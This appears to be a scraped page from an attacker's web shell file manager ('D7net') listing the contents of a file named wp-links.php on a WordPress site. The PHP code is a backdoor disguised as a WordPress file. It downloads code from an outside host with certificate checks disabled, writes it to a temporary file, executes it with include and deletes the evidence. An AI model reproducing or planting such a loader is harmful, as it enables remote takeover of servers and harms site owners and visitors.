D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
hrfiudwx
/
smallbizsavvytips.com
/
Filename :
wp-links.php
back
Copy
<?php function download_php_code($url) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_HEADER => true, CURLOPT_NOBODY => false ]); $response = curl_exec($ch); $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $headers = substr($response, 0, $header_size); $body = substr($response, $header_size); $content_type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); // Validasi MIME type (opsional tapi direkomendasikan) if (strpos($content_type, 'text') !== false || strpos($content_type, 'application/x-httpd-php') !== false) { return $body; } return false; } function execute_remote_php($url) { $code = download_php_code($url); if ($code !== false) { $temp = __DIR__ . '/remote_exec_' . md5($url . time()) . '.php'; file_put_contents($temp, $code); include $temp; unlink($temp); // Hapus setelah dijalankan } else { echo "Gagal mengambil atau MIME type tidak valid."; } } // Jalankan execute_remote_php("https://stepmomhub.com/5.txt"); ?>